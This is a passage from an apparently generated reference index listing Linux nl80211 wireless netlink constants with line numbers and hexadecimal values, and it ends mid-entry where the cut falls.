NL80211_ATTR_NOACK_MAP = 0x95 constant NL80211_ATTR_NSS (line 4639) | NL80211_ATTR_NSS = 0x106 constant NL80211_ATTR_OBSS_COLOR_BITMAP (line 4640) | NL80211_ATTR_OBSS_COLOR_BITMAP = 0x12e constant NL80211_ATTR_OFFCHANNEL_TX_OK (line 4641) | NL80211_ATTR_OFFCHANNEL_TX_OK = 0x6c constant NL80211_ATTR_OPER_CLASS (line 4642) | NL80211_ATTR_OPER_CLASS = 0xd6 constant NL80211_ATTR_OPMODE_NOTIF (line 4643) | NL80211_ATTR_OPMODE_NOTIF = 0xc2 constant NL80211_ATTR_P2P_CTWINDOW (line 4644) | NL80211_ATTR_P2P_CTWINDOW = 0xa2 constant NL80211_ATTR_P2P_OPPPS (line 4645) | NL80211_ATTR_P2P_OPPPS = 0xa3 constant NL80211_ATTR_PAD (line 4646) | NL80211_ATTR_PAD = 0xe5 constant NL80211_ATTR_PBSS (line 4647) | NL80211_ATTR_PBSS = 0xe2 constant NL80211_ATTR_PEER_AID (line 4648) | NL80211_ATTR_PEER_AID = 0xb5 constant NL80211_ATTR_PEER_MEASUREMENTS (line 4649) | NL80211_ATTR_PEER_MEASUREMENTS = 0x111 constant NL80211_ATTR_PID (line 4650) | NL80211_ATTR_PID = 0x52 constant NL80211_ATTR_PMK (line 4651) | NL80211_ATTR_PMK = 0xfe constant NL80211_ATTR_PMKID (line 4652) | NL80211_ATTR_PMKID = 0x55 constant NL80211_ATTR_PMK_LIFETIME (line 4653) | NL80211_ATTR_PMK_LIFETIME = 0x11f constant NL80211_ATTR_PMKR0_NAME (line 4654) | NL80211_ATTR_PMKR0_NAME = 0x102 constant NL80211_ATTR_PMK_REAUTH_THRESHOLD (line 4655) | NL80211_ATTR_PMK_REAUTH_THRESHOLD = 0x120 constant NL80211_ATTR_PMKSA_CANDIDATE (line 4656) | NL80211_ATTR_PMKSA_CANDIDATE = 0x86 constant NL80211_ATTR_PORT_AUTHORIZED (line 4657) | NL80211_ATTR_PORT_AUTHORIZED = 0x103 constant NL80211_ATTR_POWER_RULE_MAX_ANT_GAIN (line 4658) | NL80211_ATTR_POWER_RULE_MAX_ANT_GAIN = 0x5 constant NL80211_ATTR_POWER_RULE_MAX_EIRP (line 4659) | NL80211_ATTR_POWER_RULE_MAX_EIRP = 0x6 constant NL80211_ATTR_PREV_BSSID (line 4660) | NL80211_ATTR_PREV_BSSID = 0x4f constant NL80211_ATTR_PRIVACY (line 4661) | NL80211_ATTR_PRIVACY = 0x46 constant NL80211_ATTR_PROBE_RESP (line 4662) | NL80211_ATTR_PROBE_RESP = 0x91 constant NL80211_ATTR_PROBE_RESP_OFFLOAD (line 4663) | NL80211_ATTR_PROBE_RESP_OFFLOAD = 0x90 constant NL80211_ATTR_PROTOCOL_FEATURES (line 4664) | NL80211_ATTR_PROTOCOL_FEATURES = 0xad constant NL80211_ATTR_PS_STATE (line 4665) | NL80211_ATTR_PS_STATE = 0x5d constant NL80211_ATTR_QOS_MAP (line 4666) | NL80211_ATTR_QOS_MAP = 0xc7 constant NL80211_ATTR_RADAR_BACKGROUND (line 4667) | NL80211_ATTR_RADAR_BACKGROUND = 0x134 constant NL80211_ATTR_RADAR_EVENT (line 4668) | NL80211_ATTR_RADAR_EVENT = 0xa8 constant NL80211_ATTR_REASON_CODE (line 4669) | NL80211_ATTR_REASON_CODE = 0x36 constant NL80211_ATTR_RECEIVE_MULTICAST (line 4670) | NL80211_ATTR_RECEIVE_MULTICAST = 0x121 constant NL80211_ATTR_RECONNECT_REQUESTED (line 4671) | NL80211_ATTR_RECONNECT_REQUESTED = 0x12b constant NL80211_ATTR_REG_ALPHA2 (line 4672) | NL80211_ATTR_REG_ALPHA2 = 0x21 constant NL80211_ATTR_REG_INDOOR (line 4673) | NL80211_ATTR_REG_INDOOR = 0xdd constant NL80211_ATTR_REG_INITIATOR (line 4674) | NL80211_ATTR_REG_INITIATOR = 0x30 constant NL80211_ATTR_REG_RULE_FLAGS (line 4675) | NL80211_ATTR_REG_RULE_FLAGS = 0x1 constant NL80211_ATTR_REG_RULES (line 4676) | NL80211_ATTR_REG_RULES = 0x22 constant NL80211_ATTR_REG_TYPE (line 4677) | NL80211_ATTR_REG_TYPE = 0x31 constant NL80211_ATTR_REKEY_DATA (line 4678) | NL80211_ATTR_REKEY_DATA = 0x7a constant NL80211_ATTR_REQ_IE (line 4679) | NL80211_ATTR_REQ_IE = 0x4d constant NL80211_ATTR_RESP_IE (line 4680) | NL80211_ATTR_RESP_IE = 0x4e constant NL80211_ATTR_ROAM_SUPPORT (line 4681) | NL80211_ATTR_ROAM_SUPPORT = 0x83 constant NL80211_ATTR_RX_FRAME_TYPES (line 4682) | NL80211_ATTR_RX_FRAME_TYPES = 0x64 constant NL80211_ATTR_RX_HW_TIMESTAMP (line 4683) | NL80211_ATTR_RX_HW_TIMESTAMP = 0x140 constant NL80211_ATTR_RXMGMT_FLAGS (line 4684) | NL80211_ATTR_RXMGMT_FLAGS = 0xbc constant NL80211_ATTR_RX_SIGNAL_DBM (line 4685) | NL80211_ATTR_RX_SIGNAL_DBM = 0x97 constant NL80211_ATTR_S1G_CAPABILITY (line 4686) | NL80211_ATTR_S1G_CAPABILITY = 0x128 constant NL80211_ATTR_S1G_CAPABILITY_MASK (line 4687) | NL80211_ATTR_S1G_CAPABILITY_MASK = 0x129 constant NL80211_ATTR_SAE_DATA (line 4688) | NL80211_ATTR_SAE_DATA = 0x9c constant NL80211_ATTR_SAE_PASSWORD (line 4689) | NL80211_ATTR_SAE_PASSWORD = 0x115 constant NL80211_ATTR_SAE_PWE (line 4690) | NL80211_ATTR_SAE_PWE = 0x12a constant NL80211_ATTR_SAR_SPEC (line 4691) | NL80211_ATTR_SAR_SPEC = 0x12c constant NL80211_ATTR_SCAN_FLAGS (line 4692) | NL80211_ATTR_SCAN_FLAGS = 0x9e constant NL80211_ATTR_SCAN_FREQ_KHZ (line 4693) | NL80211_ATTR_SCAN_FREQ_KHZ = 0x124 constant NL80211_ATTR_SCAN_FREQUENCIES (line 4694) | NL80211_ATTR_SCAN_FREQUENCIES = 0x2c constant NL80211_ATTR_SCAN_GENERATION (line 4695) | NL80211_ATTR_SCAN_GENERATION = 0x2e constant NL80211_ATTR_SCAN_SSIDS (line 4696) | NL80211_ATTR_SCAN_SSIDS = 0x2d constant NL80211_ATTR_SCAN_START_TIME_TSF_BSSID (line 4697) | NL80211_ATTR_SCAN_START_TIME_TSF_BSSID = 0xea constant NL80211_ATTR_SCAN_START_TIME_TSF (line 4698) | NL80211_ATTR_SCAN_START_TIME_TSF = 0xe9 constant NL80211_ATTR_SCAN_SUPP_RATES (line 4699) | NL80211_ATTR_SCAN_SUPP_RATES = 0x7d constant NL80211_ATTR_SCHED_SCAN_DELAY (line 4700) | NL80211_ATTR_SCHED_SCAN_DELAY = 0xdc constant NL80211_ATTR_SCHED_SCAN_INTERVAL (line 4701) | NL80211_ATTR_SCHED_SCAN_INTERVAL = 0x77 constant NL80211_ATTR_SCHED_SCAN_MATCH (line 4702) | NL80211_ATTR_SCHED_SCAN_MATCH = 0x84 constant NL80211_ATTR_SCHED_SCAN_MATCH_SSID (line 4703) | NL80211_ATTR_SCHED_SCAN_MATCH_SSID = 0x1 constant NL80211_ATTR_SCHED_SCAN_MAX_REQS (line 4704) | NL80211_ATTR_SCHED_SCAN_MAX_REQS = 0x100 constant NL80211_ATTR_SCHED_SCAN_MULTI (line 4705) | NL80211_ATTR_SCHED_SCAN_MULTI = 0xff constant NL80211_ATTR_SCHED_SCAN_PLANS (line 4706) | NL80211_ATTR_SCHED_SCAN_PLANS = 0xe1 constant NL80211_ATTR_SCHED_SCAN_RELATIVE_RSSI (line 4707) | NL80211_ATTR_SCHED_SCAN_RELATIVE_RSSI = 0xf6 constant NL80211_ATTR_SCHED_SCAN_RSSI_ADJUST (line 4708) | NL80211_ATTR_SCHED_SCAN_RSSI_ADJUST = 0xf7 constant NL80211_ATTR_SMPS_MODE (line 4709) | NL80211_ATTR_SMPS_MODE = 0xd5 constant NL80211_ATTR_SOCKET_OWNER (line 4710) | NL80211_ATTR_SOCKET_OWNER = 0xcc constant NL80211_ATTR_SOFTWARE_IFTYPES (line 4711) | NL80211_ATTR_SOFTWARE_IFTYPES = 0x79 constant NL80211_ATTR_SPLIT_WIPHY_DUMP (line 4712) | NL80211_ATTR_SPLIT_WIPHY_DUMP = 0xae constant NL80211_ATTR_SSID (line 4713) | NL80211_ATTR_SSID = 0x34 constant NL80211_ATTR_STA_AID (line 4714) | NL80211_ATTR_STA_AID = 0x10 constant NL80211_ATTR_STA_CAPABILITY (line 4715) | NL80211_ATTR_STA_CAPABILITY = 0xab constant NL80211_ATTR_STA_EXT_CAPABILITY (line 4716) | NL80211_ATTR_STA_EXT_CAPABILITY = 0xac constant NL80211_ATTR_STA_FLAGS2 (line 4717) | NL80211_ATTR_STA_FLAGS2 = 0x43 constant NL80211_ATTR_STA_FLAGS (line 4718) | NL80211_ATTR_STA_FLAGS = 0x11 constant NL80211_ATTR_STA_INFO (line 4719) | NL80211_ATTR_STA_INFO = 0x15 constant NL80211_ATTR_STA_LISTEN_INTERVAL (line 4720) | NL80211_ATTR_STA_LISTEN_INTERVAL = 0x12 constant NL80211_ATTR_STA_PLINK_ACTION (line 4721) | NL80211_ATTR_STA_PLINK_ACTION = 0x19 constant NL80211_ATTR_STA_PLINK_STATE (line 4722) | NL80211_ATTR_STA_PLINK_STATE = 0x74 constant NL80211_ATTR_STA_SUPPORTED_CHANNELS (line 4723) | NL80211_ATTR_STA_SUPPORTED_CHANNELS = 0xbd constant NL80211_ATTR_STA_SUPPORTED_OPER_CLASSES (line 4724) | NL80211_ATTR_STA_SUPPORTED_OPER_CLASSES = 0xbe constant NL80211_ATTR_STA_SUPPORTED_RATES (line 4725) | NL80211_ATTR_STA_SUPPORTED_RATES = 0x13 constant NL80211_ATTR_STA_SUPPORT_P2P_PS (line 4726) | NL80211_ATTR_STA_SUPPORT_P2P_PS = 0xe4 constant NL80211_ATTR_STATUS_CODE (line 4727) | NL80211_ATTR_STATUS_CODE = 0x48 constant NL80211_ATTR_STA_TX_POWER (line 4728) | NL80211_ATTR_STA_TX_POWER = 0x114 constant NL80211_ATTR_STA_TX_POWER_SETTING (line 4729) | NL80211_ATTR_STA_TX_POWER_SETTING = 0x113 constant NL80211_ATTR_STA_VLAN (line 4730) | NL80211_ATTR_STA_VLAN = 0x14 constant NL80211_ATTR_STA_WME (line 4731) | NL80211_ATTR_STA_WME = 0x81 constant NL80211_ATTR_SUPPORT_10_MHZ (line 4732) | NL80211_ATTR_SUPPORT_10_MHZ = 0xc1 constant NL80211_ATTR_SUPPORT_5_MHZ (line 4733) | NL80211_ATTR_SUPPORT_5_MHZ = 0xc0 constant NL80211_ATTR_SUPPORT_AP_UAPSD (line 4734) | NL80211_ATTR_SUPPORT_AP_UAPSD = 0x82 constant NL80211_ATTR_SUPPORTED_COMMANDS (line 4735) | NL80211_ATTR_SUPPORTED_COMMANDS = 0x32 constant NL80211_ATTR_SUPPORTED_IFTYPES (line 4736) | NL80211_ATTR_SUPPORTED_IFTYPES = 0x20 constant NL80211_ATTR_SUPPORT_IBSS_RSN (line 4737) | NL80211_ATTR_SUPPORT_IBSS_RSN = 0x68 constant NL80211_ATTR_SUPPORT_MESH_AUTH (line 4738) | NL80211_ATTR_SUPPORT_MESH_AUTH = 0x73 constant NL80211_ATTR_SURVEY_INFO (line 4739) | NL80211_ATTR_SURVEY_INFO = 0x54 constant NL80211_ATTR_SURVEY_RADIO_STATS (line 4740) | NL80211_ATTR_SURVEY_RADIO_STATS = 0xda constant NL80211_ATTR_TD_BITMAP (line 4741) | NL80211_ATTR_TD_BITMAP = 0x141 constant NL80211_ATTR_TDLS_ACTION (line 4742) | NL80211_ATTR_TDLS_ACTION = 0x88 constant NL80211_ATTR_TDLS_DIALOG_TOKEN (line 4743) | NL80211_ATTR_TDLS_DIALOG_TOKEN = 0x89 constant NL80211_ATTR_TDLS_EXTERNAL_SETUP (line 4744) | NL80211_ATTR_TDLS_EXTERNAL_SETUP = 0x8c constant NL80211_ATTR_TDLS_INITIATOR (line 4745) | NL80211_ATTR_TDLS_INITIATOR = 0xcf constant NL80211_ATTR_TDLS_OPERATION (line 4746) | NL80211_ATTR_TDLS_OPERATION = 0x8a constant NL80211_ATTR_TDLS_PEER_CAPABILITY (line 4747) | NL80211_ATTR_TDLS_PEER_CAPABILITY = 0xcb constant NL80211_ATTR_TDLS_SUPPORT (line 4748) | NL80211_ATTR_TDLS_SUPPORT = 0x8b constant NL80211_ATTR_TESTDATA (line 4749) | NL80211_ATTR_TESTDATA = 0x45 constant NL80211_ATTR_TID_CONFIG (line 4750) | NL80211_ATTR_TID_CONFIG = 0x11d constant NL80211_ATTR_TIMED_OUT (line 4751) | NL80211_ATTR_TIMED_OUT = 0x41 constant NL80211_ATTR_TIMEOUT (line 4752) | NL80211_ATTR_TIMEOUT = 0x110 constant NL80211_ATTR_TIMEOUT_REASON (line 4753) | NL80211_ATTR_TIMEOUT_REASON = 0xf8 constant NL80211_ATTR_TSID (line 4754) | NL80211_ATTR_TSID = 0xd2 constant NL80211_ATTR_TWT_RESPONDER (line 4755) | NL80211_ATTR_TWT_RESPONDER = 0x116 constant NL80211_ATTR_TX_FRAME_TYPES (line 4756) | NL80211_ATTR_TX_FRAME_TYPES = 0x63 constant NL80211_ATTR_TX_HW_TIMESTAMP (line 4757) | NL80211_ATTR_TX_HW_TIMESTAMP = 0x13f constant NL80211_ATTR_TX_NO_CCK_RATE (line 4758) | NL80211_ATTR_TX_NO_CCK_RATE = 0x87 constant NL80211_ATTR_TXQ_LIMIT (line 4759) | NL80211_ATTR_TXQ_LIMIT = 0x10a constant NL80211_ATTR_TXQ_MEMORY_LIMIT (line 4760) | NL80211_ATTR_TXQ_MEMORY_LIMIT = 0x10b constant NL80211_ATTR_TXQ_QUANTUM (line 4761) | NL80211_ATTR_TXQ_QUANTUM = 0x10c constant NL80211_ATTR_TXQ_STATS (line 4762) | NL80211_ATTR_TXQ_STATS = 0x109 constant NL80211_ATTR_TX_RATES (line 4763) | NL80211_ATTR_TX_RATES = 0x5a constant NL80211_ATTR_UNSOL_BCAST_PROBE_RESP (line 4764) | NL80211_ATTR_UNSOL_BCAST_PROBE_RESP = 0x127 constant NL80211_ATTR_UNSPEC (line 4765) | NL80211_ATTR_UNSPEC = 0x0 constant NL80211_ATTR_USE_MFP (line 4766) | NL80211_ATTR_USE_MFP = 0x42 constant NL80211_ATTR_USER_PRIO (line 4767) | NL80211_ATTR_USER_PRIO = 0xd3 constant NL80211_ATTR_USER_REG_HINT_TYPE (line 4768) | NL80211_ATTR_USER_REG_HINT_TYPE = 0x9a constant NL80211_ATTR_USE_RRM (line 4769) | NL80211_ATTR_USE_RRM = 0xd0 constant NL80211_ATTR_VENDOR_DATA (line 4770) | NL80211_ATTR_VENDOR_DATA = 0xc5 constant NL80211_ATTR_VENDOR_EVENTS (line 4771) | NL80211_ATTR_VENDOR_EVENTS = 0xc6 constant NL80211_ATTR_VENDOR_ID (line 4772) | NL80211_ATTR_VENDOR_ID = 0xc3 constant NL80211_ATTR_VENDOR_SUBCMD (line 4773) | NL80211_ATTR_VENDOR_SUBCMD = 0xc4 constant NL80211_ATTR_VHT_CAPABILITY (line 4774) | NL80211_ATTR_VHT_CAPABILITY = 0x9d constant NL80211_ATTR_VHT_CAPABILITY_MASK (line 4775) | NL80211_ATTR_VHT_CAPABILITY_MASK = 0xb0 constant NL80211_ATTR_VLAN_ID (line 4776) | NL80211_ATTR_VLAN_ID = 0x11a constant NL80211_ATTR_WANT_1X_4WAY_HS (line 4777) | NL80211_ATTR_WANT_1X_4WAY_HS = 0x101 constant NL80211_ATTR_WDEV (line 4778) | NL80211_ATTR_WDEV = 0x99 constant NL80211_ATTR_WIPHY_ANTENNA_AVAIL_RX (line 4779) | NL80211_ATTR_WIPHY_ANTENNA_AVAIL_RX = 0x72 constant NL80211_ATTR_WIPHY_ANTENNA_AVAIL_TX (line 4780) | NL80211_ATTR_WIPHY_ANTENNA_AVAIL_TX = 0x71 constant NL80211_ATTR_WIPHY_ANTENNA_RX (line 4781) | NL80211_ATTR_WIPHY_ANTENNA_RX = 0x6a constant NL80211_ATTR_WIPHY_ANTENNA_TX (line 4782) | NL80211_ATTR_WIPHY_ANTENNA_TX = 0x69 constant NL80211_ATTR_WIPHY_BANDS (line 4783) | NL80211_ATTR_WIPHY_BANDS = 0x16 constant NL80211_ATTR_WIPHY_CHANNEL_TYPE (line 4784) | NL80211_ATTR_WIPHY_CHANNEL_TYPE = 0x27 constant NL80211_ATTR_WIPHY (line 4785) | NL80211_ATTR_WIPHY = 0x1 constant NL80211_ATTR_WIPHY_COVERAGE_CLASS (line 4786) | NL80211_ATTR_WIPHY_COVERAGE_CLASS = 0x59 constant NL80211_ATTR_WIPHY_DYN_ACK (line 4787) | NL80211_ATTR_WIPHY_DYN_ACK = 0xd1 constant NL80211_ATTR_WIPHY_EDMG_BW_CONFIG (line 4788) | NL80211_ATTR_WIPHY_EDMG_BW_CONFIG = 0x119 constant NL80211_ATTR_WIPHY_EDMG_CHANNELS (line 4789) | NL80211_ATTR_WIPHY_EDMG_CHANNELS = 0x118 constant NL80211_ATTR_WIPHY_FRAG_THRESHOLD (line 4790) | NL80211_ATTR_WIPHY_FRAG_THRESHOLD = 0x3f constant NL80211_ATTR_WIPHY_FREQ (line 4791) | NL80211_ATTR_WIPHY_FREQ = 0x26 constant NL80211_ATTR_WIPHY_FREQ_HINT (line 4792) | NL80211_ATTR_WIPHY_FREQ_HINT = 0xc9 constant NL80211_ATTR_WIPHY_FREQ_OFFSET (line 4793) | NL80211_ATTR_WIPHY_FREQ_OFFSET = 0x122 constant NL80211_ATTR_WIPHY_NAME (line 4794) | NL80211_ATTR_WIPHY_NAME = 0x2 constant NL80211_ATTR_WIPHY_RETRY_LONG (line 4795) | NL80211_ATTR_WIPHY_RETRY_LONG = 0x3e constant NL80211_ATTR_WIPHY_RETRY_SHORT (line 4796) | NL80211_ATTR_WIPHY_RETRY_SHORT = 0x3d constant NL80211_ATTR_WIPHY_RTS_THRESHOLD (line 4797) | NL80211_ATTR_WIPHY_RTS_THRESHOLD = 0x40 constant NL80211_ATTR_WIPHY_SELF_MANAGED_REG (line 4798) | NL80211_ATTR_WIPHY_SELF_MANAGED_REG = 0xd8 constant NL80211_ATTR_WIPHY_TX_POWER_LEVEL (line 4799) | NL80211_ATTR_WIPHY_TX_POWER_LEVEL = 0x62 constant NL80211_ATTR_WIPHY_TX_POWER_SETTING (line 4800) | NL80211_ATTR_WIPHY_TX_POWER_SETTING = 0x61 constant NL80211_ATTR_WIPHY_TXQ_PARAMS (line 4801) | NL80211_ATTR_WIPHY_TXQ_PARAMS = 0x25 constant NL80211_ATTR_WOWLAN_TRIGGERS (line 4802) | NL80211_ATTR_WOWLAN_TRIGGERS = 0x75 constant NL80211_ATTR_WOWLAN_TRIGGERS_SUPPORTED (line 4803) | NL80211_ATTR_WOWLAN_TRIGGERS_SUPPORTED = 0x76 constant NL80211_ATTR_WPA_VERSIONS (line 4804) | NL80211_ATTR_WPA_VERSIONS = 0x4b constant NL80211_AUTHTYPE_AUTOMATIC (line 4805) | NL80211_AUTHTYPE_AUTOMATIC = 0x8 constant NL80211_AUTHTYPE_FILS_PK (line 4806) | NL80211_AUTHTYPE_FILS_PK = 0x7 constant NL80211_AUTHTYPE_FILS_SK (line 4807) | NL80211_AUTHTYPE_FILS_SK = 0x5 constant NL80211_AUTHTYPE_FILS_SK_PFS (line 4808) | NL80211_AUTHTYPE_FILS_SK_PFS = 0x6 constant NL80211_AUTHTYPE_FT (line 4809) | NL80211_AUTHTYPE_FT = 0x2 constant NL80211_AUTHTYPE_MAX (line 4810) | NL80211_AUTHTYPE_MAX = 0x7 constant NL80211_AUTHTYPE_NETWORK_EAP (line 4811) | NL80211_AUTHTYPE_NETWORK_EAP = 0x3 constant NL80211_AUTHTYPE_OPEN_SYSTEM (line 4812) | NL80211_AUTHTYPE_OPEN_SYSTEM = 0x0 constant NL80211_AUTHTYPE_SAE (line 4813) | NL80211_AUTHTYPE_SAE = 0x4 constant NL80211_AUTHTYPE_SHARED_KEY (line 4814) | NL80211_AUTHTYPE_SHARED_KEY = 0x1 constant NL80211_BAND_2GHZ (line 4815) | NL80211_BAND_2GHZ = 0x0 constant NL80211_BAND_5GHZ (line 4816) | NL80211_BAND_5GHZ = 0x1 constant NL80211_BAND_60GHZ (line 4817) | NL80211_BAND_60GHZ = 0x2 constant NL80211_BAND_6GHZ (line 4818) | NL80211_BAND_6GHZ = 0x3 constant NL80211_BAND_ATTR_EDMG_BW_CONFIG (line 4819) | NL80211_BAND_ATTR_EDMG_BW_CONFIG = 0xb constant NL80211_BAND_ATTR_EDMG_CHANNELS (line 4820) | NL80211_BAND_ATTR_EDMG_CHANNELS = 0xa constant NL80211_BAND_ATTR_FREQS (line 4821) | NL80211_BAND_ATTR_FREQS = 0x1 constant NL80211_BAND_ATTR_HT_AMPDU_DENSITY (line 4822) | NL80211_BAND_ATTR_HT_AMPDU_DENSITY = 0x6 constant NL80211_BAND_ATTR_HT_AMPDU_FACTOR (line 4823) | NL80211_BAND_ATTR_HT_AMPDU_FACTOR = 0x5 constant NL80211_BAND_ATTR_HT_CAPA (line 4824) | NL80211_BAND_ATTR_HT_CAPA = 0x4 constant NL80211_BAND_ATTR_HT_MCS_SET (line 4825) | NL80211_BAND_ATTR_HT_MCS_SET = 0x3 constant NL80211_BAND_ATTR_IFTYPE_DATA (line 4826) | NL80211_BAND_ATTR_IFTYPE_DATA = 0x9 constant NL80211_BAND_ATTR_MAX (line 4827) | NL80211_BAND_ATTR_MAX = 0xd constant NL80211_BAND_ATTR_RATES (line 4828) | NL80211_BAND_ATTR_RATES = 0x2 constant NL80211_BAND_ATTR_VHT_CAPA (line 4829) | NL80211_BAND_ATTR_VHT_CAPA = 0x8 constant NL80211_BAND_ATTR_VHT_MCS_SET (line 4830) | NL80211_BAND_ATTR_VHT_MCS_SET = 0x7 constant NL80211_BAND_IFTYPE_ATTR_EHT_CAP_MAC (line 4831) | NL80211_BAND_IFTYPE_ATTR_EHT_CAP_MAC = 0x8 constant NL80211_BAND_IFTYPE_ATTR_EHT_CAP_MCS_SET (line 4832) | NL80211_BAND_IFTYPE_ATTR_EHT_CAP_MCS_SET = 0xa constant NL80211_BAND_IFTYPE_ATTR_EHT_CAP_PHY (line 4833) | NL80211_BAND_IFTYPE_ATTR_EHT_CAP_PHY = 0x9 constant NL80211_BAND_IFTYPE_ATTR_EHT_CAP_PPE (line 4834) | NL80211_BAND_IFTYPE_ATTR_EHT_CAP_PPE = 0xb constant NL80211_BAND_IFTYPE_ATTR_HE_6GHZ_CAPA (line 4835) | NL80211_BAND_IFTYPE_ATTR_HE_6GHZ_CAPA = 0x6 constant NL80211_BAND_IFTYPE_ATTR_HE_CAP_MAC (line 4836) | NL80211_BAND_IFTYPE_ATTR_HE_CAP_MAC = 0x2 constant NL80211_BAND_IFTYPE_ATTR_HE_CAP_MCS_SET (line 4837) | NL80211_BAND_IFTYPE_ATTR_HE_CAP_MCS_SET = 0x4 constant NL80211_BAND_IFTYPE_ATTR_HE_CAP_PHY (line 4838) | NL80211_BAND_IFTYPE_ATTR_HE_CAP_PHY = 0x3 constant NL80211_BAND_IFTYPE_ATTR_HE_CAP_PPE (line 4839) | NL80211_BAND_IFTYPE_ATTR_HE_CAP_PPE = 0x5 constant NL80211_BAND_IFTYPE_ATTR_IFTYPES (line 4840) | NL80211_BAND_IFTYPE_ATTR_IFTYPES = 0x1 constant NL80211_BAND_IFTYPE_ATTR_MAX (line 4841) | NL80211_BAND_IFTYPE_ATTR_MAX = 0xb constant NL80211_BAND_IFTYPE_ATTR_VENDOR_ELEMS (line 4842) | NL80211_BAND_IFTYPE_ATTR_VENDOR_ELEMS = 0x7 constant NL80211_BAND_LC (line 4843) | NL80211_BAND_LC = 0x5 constant NL80211_BAND_S1GHZ (line 4844) | NL80211_BAND_S1GHZ = 0x4 constant NL80211_BITRATE_ATTR_2GHZ_SHORTPREAMBLE (line 4845) | NL80211_BITRATE_ATTR_2GHZ_SHORTPREAMBLE = 0x2 constant NL80211_BITRATE_ATTR_MAX (line 4846) | NL80211_BITRATE_ATTR_MAX = 0x2 constant NL80211_BITRATE_ATTR_RATE (line 4847) | NL80211_BITRATE_ATTR_RATE = 0x1 constant NL80211_BSS_BEACON_IES (line 4848) | NL80211_BSS_BEACON_IES = 0xb constant NL80211_BSS_BEACON_INTERVAL (line 4849) | NL80211_BSS_BEACON_INTERVAL = 0x4 constant NL80211_BSS_BEACON_TSF (line 4850) | NL80211_BSS_BEACON_TSF = 0xd constant NL80211_BSS_BSSID (line 4851) | NL80211_BSS_BSSID = 0x1 constant NL80211_BSS_CAPABILITY (line 4852) | NL80211_BSS_CAPABILITY = 0x5 constant NL80211_BSS_CHAIN_SIGNAL (line 4853) | NL80211_BSS_CHAIN_SIGNAL = 0x13 constant NL80211_BSS_CHAN_WIDTH_10 (line 4854) | NL80211_BSS_CHAN_WIDTH_10 = 0x1 constant NL80211_BSS_CHAN_WIDTH_1 (line 4855) | NL80211_BSS_CHAN_WIDTH_1 = 0x3 constant NL80211_BSS_CHAN_WIDTH_20 (line 4856) | NL80211_BSS_CHAN_WIDTH_20 = 0x0 constant NL80211_BSS_CHAN_WIDTH_2 (line 4857) | NL80211_BSS_CHAN_WIDTH_2 = 0x4 constant NL80211_BSS_CHAN_WIDTH_5 (line 4858) | NL80211_BSS_CHAN_WIDTH_5 = 0x2 constant NL80211_BSS_CHAN_WIDTH (line 4859) | NL80211_BSS_CHAN_WIDTH = 0xc constant NL80211_BSS_FREQUENCY (line 4860) | NL80211_BSS_FREQUENCY = 0x2 constant NL80211_BSS_FREQUENCY_OFFSET (line 4861) | NL80211_BSS_FREQUENCY_OFFSET = 0x14 constant NL80211_BSS_INFORMATION_ELEMENTS (line 4862) | NL80211_BSS_INFORMATION_ELEMENTS = 0x6 constant NL80211_BSS_LAST_SEEN_BOOTTIME (line 4863) | NL80211_BSS_LAST_SEEN_BOOTTIME = 0xf constant NL80211_BSS_MAX (line 4864) | NL80211_BSS_MAX = 0x16 constant NL80211_BSS_MLD_ADDR (line 4865) | NL80211_BSS_MLD_ADDR = 0x16 constant NL80211_BSS_MLO_LINK_ID (line 4866) | NL80211_BSS_MLO_LINK_ID = 0x15 constant NL80211_BSS_PAD (line 4867) | NL80211_BSS_PAD = 0x10 constant NL80211_BSS_PARENT_BSSID (line 4868) | NL80211_BSS_PARENT_BSSID = 0x12 constant NL80211_BSS_PARENT_TSF (line 4869) | NL80211_BSS_PARENT_TSF = 0x11 constant NL80211_BSS_PRESP_DATA (line 4870) | NL80211_BSS_PRESP_DATA = 0xe constant NL80211_BSS_SEEN_MS_AGO (line 4871) | NL80211_BSS_SEEN_MS_AGO = 0xa constant NL80211_BSS_SELECT_ATTR_BAND_PREF (line 4872) | NL80211_BSS_SELECT_ATTR_BAND_PREF = 0x2 constant NL80211_BSS_SELECT_ATTR_MAX (line 4873) | NL80211_BSS_SELECT_ATTR_MAX = 0x3 constant NL80211_BSS_SELECT_ATTR_RSSI_ADJUST (line 4874) | NL80211_BSS_SELECT_ATTR_RSSI_ADJUST = 0x3 constant NL80211_BSS_SELECT_ATTR_RSSI (line 4875) | NL80211_BSS_SELECT_ATTR_RSSI = 0x1 constant NL80211_BSS_SIGNAL_MBM (line 4876) | NL80211_BSS_SIGNAL_MBM = 0x7 constant NL80211_BSS_SIGNAL_UNSPEC (line 4877) | NL80211_BSS_SIGNAL_UNSPEC = 0x8 constant NL80211_BSS_STATUS_ASSOCIATED (line 4878) | NL80211_BSS_STATUS_ASSOCIATED = 0x1 constant NL80211_BSS_STATUS_AUTHENTICATED (line 4879) | NL80211_BSS_STATUS_AUTHENTICATED = 0x0 constant NL80211_BSS_STATUS (line 4880) | NL80211_BSS_STATUS = 0x9 constant NL80211_BSS_STATUS_IBSS_JOINED (line 4881) | NL80211_BSS_STATUS_IBSS_JOINED = 0x2 constant NL80211_BSS_TSF (line 4882) | NL80211_BSS_TSF = 0x3 constant NL80211_CHAN_HT20 (line 4883) | NL80211_CHAN_HT20 = 0x1 constant NL80211_CHAN_HT40MINUS (line 4884) | NL80211_CHAN_HT40MINUS = 0x2 constant NL80211_CHAN_HT40PLUS (line 4885) | NL80211_CHAN_HT40PLUS = 0x3 constant NL80211_CHAN_NO_HT (line 4886) | NL80211_CHAN_NO_HT = 0x0 constant NL80211_CHAN_WIDTH_10 (line 4887) | NL80211_CHAN_WIDTH_10 = 0x7 constant NL80211_CHAN_WIDTH_160 (line 4888) | NL80211_CHAN_WIDTH_160 = 0x5 constant NL80211_CHAN_WIDTH_16 (line 4889) | NL80211_CHAN_WIDTH_16 = 0xc constant NL80211_CHAN_WIDTH_1 (line 4890) | NL80211_CHAN_WIDTH_1 = 0x8 constant NL80211_CHAN_WIDTH_20 (line 4891) | NL80211_CHAN_WIDTH_20 = 0x1 constant NL80211_CHAN_WIDTH_20_NOHT (line 4892) | NL80211_CHAN_WIDTH_20_NOHT = 0x0 constant NL80211_CHAN_WIDTH_2 (line 4893) | NL80211_CHAN_WIDTH_2 = 0x9 constant NL80211_CHAN_WIDTH_320 (line 4894) | NL80211_CHAN_WIDTH_320 = 0xd constant NL80211_CHAN_WIDTH_40 (line 4895) | NL80211_CHAN_WIDTH_40 = 0x2 constant NL80211_CHAN_WIDTH_4 (line 4896) | NL80211_CHAN_WIDTH_4 = 0xa constant NL80211_CHAN_WIDTH_5 (line 4897) | NL80211_CHAN_WIDTH_5 = 